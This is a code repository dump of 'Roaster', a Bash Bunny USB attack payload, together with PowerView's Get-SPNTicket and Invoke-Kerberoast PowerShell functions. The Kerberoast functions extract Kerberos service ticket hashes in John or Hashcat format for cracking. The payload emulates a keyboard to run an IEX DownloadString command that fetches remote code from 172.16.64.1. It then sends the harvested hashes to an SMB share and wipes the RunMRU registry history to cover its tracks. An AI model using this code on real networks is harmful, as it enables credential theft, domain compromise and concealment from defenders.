409 | Write-Verbose "Extracted domain '$Domain' from -Credential" 410 | } 411 | else { 412 | $TargetDomain = $Domain 413 | } 414 | 415 | $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $TargetDomain, $Credential.UserName, $Credential.GetNetworkCredential().Password) 416 | 417 | try { 418 | [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) 419 | } 420 | catch { 421 | Write-Verbose "The specified domain does '$TargetDomain' not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid." 422 | $Null 423 | } 424 | } 425 | elseif ($Domain) { 426 | $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain) 427 | try { 428 | [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) 429 | } 430 | catch { 431 | Write-Verbose "The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust." 432 | $Null 433 | } 434 | } 435 | else { 436 | [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() 437 | } 438 | } 439 | } 440 | 441 | 442 | function Get-SPNTicket { 443 | <# 444 | .SYNOPSIS 445 | 446 | Request the kerberos ticket for a specified service principal name (SPN). 447 | 448 | Author: @machosec, Will Schroeder (@harmj0y) 449 | License: BSD 3-Clause 450 | Required Dependencies: None 451 | 452 | .DESCRIPTION 453 | 454 | This function will either take one/more SPN strings, or one/more PowerView.User objects 455 | (the output from Get-NetUser) and will request a kerberos ticket for the given SPN 456 | using System.IdentityModel.Tokens.KerberosRequestorSecurityToken. The encrypted 457 | portion of the ticket is then extracted and output in either crackable John or Hashcat 458 | format (deafult of John). 459 | 460 | .PARAMETER SPN 461 | 462 | Specifies the service principal name to request the ticket for. 463 | 464 | .PARAMETER User 465 | 466 | Specifies a PowerView.User object (result of Get-NetUser) to request the ticket for. 467 | 468 | .PARAMETER OutputFormat 469 | 470 | Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format. 471 | Defaults to 'John'. 472 | 473 | .EXAMPLE 474 | 475 | Get-SPNTicket -SPN "HTTP/web.testlab.local" 476 | 477 | Request a kerberos service ticket for the specified SPN. 478 | 479 | .EXAMPLE 480 | 481 | "HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-SPNTicket 482 | 483 | Request kerberos service tickets for all SPNs passed on the pipeline. 484 | 485 | .EXAMPLE 486 | 487 | Get-NetUser -SPN | Get-SPNTicket -OutputFormat Hashcat 488 | 489 | Request kerberos service tickets for all users with non-null SPNs and output in Hashcat format. 490 | 491 | .INPUTS 492 | 493 | String 494 | 495 | Accepts one or more SPN strings on the pipeline with the RawSPN parameter set. 496 | 497 | .INPUTS 498 | 499 | PowerView.User 500 | 501 | Accepts one or more PowerView.User objects on the pipeline with the User parameter set. 502 | 503 | .OUTPUTS 504 | 505 | PowerView.SPNTicket 506 | 507 | Outputs a custom object containing the SamAccountName, DistinguishedName, ServicePrincipalName, and encrypted ticket section. 508 | #> 509 | 510 | [OutputType('PowerView.SPNTicket')] 511 | [CmdletBinding(DefaultParameterSetName='RawSPN')] 512 | Param ( 513 | [Parameter(Position = 0, ParameterSetName = 'RawSPN', Mandatory = $True, ValueFromPipeline = $True)] 514 | [ValidatePattern('.*/.*')] 515 | [Alias('ServicePrincipalName')] 516 | [String[]] 517 | $SPN, 518 | 519 | [Parameter(Position = 0, ParameterSetName = 'User', Mandatory = $True, ValueFromPipeline = $True)] 520 | [ValidateScript({ $_.PSObject.TypeNames[0] -eq 'PowerView.User' })] 521 | [Object[]] 522 | $User, 523 | 524 | [Parameter(Position = 1)] 525 | [ValidateSet('John', 'Hashcat')] 526 | [Alias('Format')] 527 | [String] 528 | $OutputFormat = 'John' 529 | ) 530 | 531 | BEGIN { 532 | $Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') 533 | } 534 | 535 | PROCESS { 536 | if ($PSBoundParameters['User']) { 537 | $TargetObject = $User 538 | } 539 | else { 540 | $TargetObject = $SPN 541 | } 542 | 543 | ForEach ($Object in $TargetObject) { 544 | if ($PSBoundParameters['User']) { 545 | $UserSPN = $Object.ServicePrincipalName 546 | $SamAccountName = $Object.SamAccountName 547 | $DistinguishedName = $Object.DistinguishedName 548 | } 549 | else { 550 | $UserSPN = $Object 551 | $SamAccountName = $Null 552 | $DistinguishedName = $Null 553 | } 554 | 555 | $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN 556 | $TicketByteStream = $Ticket.GetRequest() 557 | if ($TicketByteStream) { 558 | $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace '-' 559 | [System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split 'A48201' 560 | $Parts.RemoveAt($Parts.Count - 1) 561 | $Hash = $Parts -join 'A48201' 562 | $Hash = $Hash.Insert(32, '$') 563 | 564 | $Out = New-Object PSObject 565 | $Out | Add-Member Noteproperty 'SamAccountName' $SamAccountName 566 | $Out | Add-Member Noteproperty 'DistinguishedName' $DistinguishedName 567 | $Out | Add-Member Noteproperty 'ServicePrincipalName' $Ticket.ServicePrincipalName 568 | 569 | if ($OutputFormat -match 'John') { 570 | $HashFormat = "`$krb5tgs`$unknown:$Hash" 571 | } 572 | else { 573 | # hashcat output format 574 | $HashFormat = '$krb5tgs$23$*ID#124_DISTINGUISHED NAME: CN=fakesvc,OU=Service,OU=Accounts,OU=EnterpriseObjects,DC=asdf,DC=pd,DC=fakedomain,DC=com SPN: F3514235-4C06-11D1-AB04-00D04FC2DCD2-GDCD/asdf.asdf.pd.fakedomain.com:50000 *' + $Hash 575 | } 576 | $Out | Add-Member Noteproperty 'Hash' $HashFormat 577 | 578 | $Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket') 579 | 580 | Write-Output $Out 581 | break 582 | } 583 | } 584 | } 585 | } 586 | 587 | 588 | function Invoke-Kerberoast { 589 | <# 590 | .SYNOPSIS 591 | 592 | Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes. 593 | 594 | Author: Will Schroeder (@harmj0y), @machosec 595 | License: BSD 3-Clause 596 | Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Get-SPNTicket 597 | 598 | .DESCRIPTION 599 | 600 | Implements code from Get-NetUser to quyery for user accounts with non-null service principle 601 | names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information. 602 | The ticket format can be specified with -OutputFormat 603 | 604 | .PARAMETER Identity 605 | 606 | A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), 607 | SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). 608 | Wildcards accepted. By default all accounts will be queried for non-null SPNs. 609 | 610 | .PARAMETER AdminCount 611 | 612 | Switch. Return users with adminCount=1. 613 | 614 | .PARAMETER Domain 615 | 616 | Specifies the domain to use for the query, defaults to the current domain. 617 | 618 | .PARAMETER LDAPFilter 619 | 620 | Specifies an LDAP query string that is used to filter Active Directory objects. 621 | 622 | .PARAMETER SearchBase 623 | 624 | The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" 625 | Useful for OU queries. 626 | 627 | .PARAMETER Server 628 | 629 | Specifies an Active Directory server (domain controller) to bind to. 630 | 631 | .PARAMETER SearchScope 632 | 633 | Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). 634 | 635 | .PARAMETER ResultPageSize 636 | 637 | Specifies the PageSize to set for the LDAP searcher object. 638 | 639 | .PARAMETER Credential 640 | 641 | A [Management.Automation.PSCredential] object of alternate credentials 642 | for connection to the target domain. 643 | 644 | .PARAMETER OutputFormat 645 | 646 | Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format. 647 | Defaults to 'John'. 648 | 649 | .EXAMPLE 650 | 651 | Invoke-Kerberoast | fl 652 | 653 | SamAccountName : SQLService 654 | DistinguishedName : CN=SQLService,CN=Users,DC=testlab,DC=local 655 | ServicePrincipalName : MSSQLSvc/PRIMARY.testlab.local:1433 656 | Hash : $krb5tgs$unknown:30FFC786BECD0E88992CBBB017155C53$0343A9C8... 657 | 658 | .EXAMPLE 659 | 660 | Invoke-Kerberoast -Domain dev.testlab.local | ConvertTo-CSV -NoTypeInformation 661 | 662 | "SamAccountName","DistinguishedName","ServicePrincipalName","Hash" 663 | "SQLSVC","CN=SQLSVC,CN=Users,DC=dev,DC=testlab,DC=local","MSSQLSvc/secondary.dev.testlab.local:1433","$krb5tgs$unknown:ECF4BDD1037D1D9E2E091ABBDC92F00E$0F3A4... 664 | 665 | .EXAMPLE 666 | 667 | Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | fl 668 | 669 | SamAccountName : SQLService 670 | DistinguishedName : CN=SQLService,CN=Users,DC=testlab,DC=local 671 | ServicePrincipalName : MSSQLSvc/PRIMARY.testlab.local:1433 672 | Hash : $krb5tgs$23$*ID#124_DISTINGUISHED NAME: CN=fakesvc,OU=Se 673 | rvice,OU=Accounts,OU=EnterpriseObjects,DC=proddfs,DC=pf, 674 | DC=fakedomain,DC=com SPN: H3514235-4C06-12D1-AB04-00D04F 675 | C2DCD2-GDCD/asdf.asdf.pd.fakedomain.com:50000 *30 676 | FFC786BECD0E88992CBBB017155C53$0343A9C8A7EB90F059CD92B52 677 | .... 678 | 679 | .INPUTS 680 | 681 | String 682 | 683 | Accepts one or more SPN strings on the pipeline with the RawSPN parameter set. 684 | 685 | .OUTPUTS 686 | 687 | PowerView.SPNTicket 688 | 689 | Outputs a custom object containing the SamAccountName, DistinguishedName, ServicePrincipalName, and encrypted ticket section. 690 | #> 691 | 692 | [OutputType('PowerView.SPNTicket')] 693 | [CmdletBinding()] 694 | Param( 695 | [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] 696 | [Alias('SamAccountName', 'Name')] 697 | [String[]] 698 | $Identity, 699 | 700 | [Switch] 701 | $AdminCount, 702 | 703 | [ValidateNotNullOrEmpty()] 704 | [String] 705 | $Domain, 706 | 707 | [ValidateNotNullOrEmpty()] 708 | [Alias('Filter')] 709 | [String] 710 | $LDAPFilter, 711 | 712 | [ValidateNotNullOrEmpty()] 713 | [String] 714 | $SearchBase, 715 | 716 | [ValidateNotNullOrEmpty()] 717 | [String] 718 | $Server, 719 | 720 | [ValidateSet('Base', 'OneLevel', 'Subtree')] 721 | [String] 722 | $SearchScope = 'Subtree', 723 | 724 | [ValidateRange(1,10000)] 725 | [Int] 726 | $ResultPageSize = 200, 727 | 728 | [Management.Automation.PSCredential] 729 | [Management.Automation.CredentialAttribute()] 730 | $Credential = [Management.Automation.PSCredential]::Empty, 731 | 732 | [ValidateSet('John', 'Hashcat')] 733 | [Alias('Format')] 734 | [String] 735 | $OutputFormat = 'John' 736 | ) 737 | 738 | BEGIN { 739 | $SearcherArguments = @{} 740 | if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } 741 | if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } 742 | if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } 743 | if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } 744 | if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } 745 | if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } 746 | $UserSearcher = Get-DomainSearcher @SearcherArguments 747 | 748 | $GetSPNTicketArguments = @{} 749 | if ($PSBoundParameters['OutputFormat']) { $GetSPNTicketArguments['OutputFormat'] = $OutputFormat } 750 | 751 | } 752 | 753 | PROCESS { 754 | if ($UserSearcher) { 755 | $IdentityFilter = '' 756 | $Filter = '' 757 | $Identity | Where-Object {$_} | ForEach-Object { 758 | $IdentityInstance = $_ 759 | if ($IdentityInstance -match '^S-1-.*') { 760 | $IdentityFilter += "(objectsid=$IdentityInstance)" 761 | } 762 | elseif ($IdentityInstance -match '^CN=.*') { 763 | $IdentityFilter += "(distinguishedname=$IdentityInstance)" 764 | } 765 | else { 766 | try { 767 | $Null = [System.Guid]::Parse($IdentityInstance) 768 | $IdentityFilter += "(objectguid=$IdentityInstance)" 769 | } 770 | catch { 771 | $IdentityFilter += "(samAccountName=$IdentityInstance)" 772 | } 773 | } 774 | } 775 | if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { 776 | $Filter += "(|$IdentityFilter)" 777 | } 778 | $Filter += '(servicePrincipalName=*)' 779 | 780 | if ($PSBoundParameters['AdminCount']) { 781 | Write-Verbose 'Searching for adminCount=1' 782 | $Filter += '(admincount=1)' 783 | } 784 | if ($PSBoundParameters['LDAPFilter']) { 785 | Write-Verbose "Using additional LDAP filter: $LDAPFilter" 786 | $Filter += "$LDAPFilter" 787 | } 788 | 789 | $UserSearcher.filter = "(&(samAccountType=805306368)$Filter)" 790 | Write-Verbose "Invoke-Kerberoast search filter string: $($UserSearcher.filter)" 791 | 792 | $Results = $UserSearcher.FindAll() 793 | $Results | Where-Object {$_} | ForEach-Object { 794 | $User = Convert-LDAPProperty -Properties $_.Properties 795 | $User.PSObject.TypeNames.Insert(0, 'PowerView.User') 796 | $User 797 | } | Where-Object {$_.SamAccountName -notmatch 'krbtgt'} | Get-SPNTicket @GetSPNTicketArguments 798 | 799 | $Results.dispose() 800 | $UserSearcher.dispose() 801 | } 802 | } 803 | } -------------------------------------------------------------------------------- /Roaster/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Roaster 4 | # Author: golem445 5 | # Version: 1.0 6 | # Dependencies: impacket, gohttp 7 | # Runtime: ~10 seconds 8 | # 9 | # Sets up Ethernet and HID keyboard interfaces simultaneously, 10 | # then uses HID to import Invoke-Kerberoast into memory via 11 | # Bash Bunny web server and execute the attack. Results are 12 | # exported to the loot directory via SMB. 13 | # 14 | 15 | ### Prep for attack ### 16 | LED SETUP 17 | REQUIRETOOL impacket gohttp 18 | GET SWITCH_POSITION 19 | 20 | # Temporary loot directory 21 | mkdir -p /loot/smb/ 22 | 23 | # Permanent loot directory 24 | mkdir -p /root/udisk/loot/roaster_exfil/ 25 | 26 | # Set interfaces 27 | ATTACKMODE RNDIS_ETHERNET HID 28 | 29 | # Start web server 30 | cd /root/udisk/payloads/$SWITCH_POSITION 31 | gohttp -p 80 & 32 | 33 | # Start SMB Server 34 | python /tools/impacket/examples/smbserver.py s /loot/smb & 35 | 36 | ### Start attack ### 37 | LED ATTACK 38 | RUN WIN powershell "IEX (New-object Net.Webclient).DownloadString('http://172.16.64.1/s.ps1')" 39 | 40 | # Wait until files are done copying. 41 | LED STAGE2 42 | while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done 43 | 44 | ### Cleanup ### 45 | LED CLEANUP 46 | 47 | # Delete Exfil file 48 | rm /loot/smb/EXFILTRATION_COMPLETE 49 | 50 | # Move Kerberos SPNS to permanent loot directory 51 | mv /loot/smb/* /root/udisk/loot/roaster_exfil/ 52 | 53 | # Clean up temporary loot directory 54 | rm -rf /loot/smb/* 55 | 56 | # Sync file system 57 | sync 58 | 59 | # Complete 60 | LED FINISH -------------------------------------------------------------------------------- /Roaster/readme.md: -------------------------------------------------------------------------------- 1 | # Roaster 2 | * Author: golem445 3 | * Version: 1.0 4 | * Target: Windows Domains 5 | 6 | ## Description 7 | 8 | Sets up Ethernet and HID keyboard interfaces simultaneously, 9 | then uses HID to import Invoke-Kerberoast into memory via 10 | Bash Bunny web server and execute the attack. Results are 11 | exported to the loot directory via SMB. 12 | 13 | Note: This module will bypass network restrictions on USB 14 | disk drives as only a network card and keyboard are emulated. 15 | 16 | ## Requirements 17 | 18 | Impacket and gohttp should be installed 19 | 20 | ## STATUS 21 | 22 | 23 | | Status | Description | 24 | | ------------------- | ---------------------------------------- | 25 | | Flashing Red | Impacket or gohttp not found | 26 | | Solid Violet | Setup for attack | 27 | | Flashing Amber | Attack in progress | 28 | | Flashing Cyan | Cleaning up | 29 | | Solid Green | Attack complete | 30 | 31 | ## Credits 32 | 33 | * Tim Medin for Kerberoast 34 | * Hak5Darren for SMB exfil -------------------------------------------------------------------------------- /Roaster/s.ps1: -------------------------------------------------------------------------------- 1 | IEX (New-Object Net.Webclient).DownloadString('http://172.16.64.1/Invoke-Kerberoast.ps1') 2 | Invoke-Kerberoast -Outputformat Hashcat | fl > \\172.16.64.1\s\output.txt 3 | New-Item -Path \\172.16.64.1\s -ItemType "file" -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE" 4 | Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue 5 | exit --------------------------------------------------------------------------------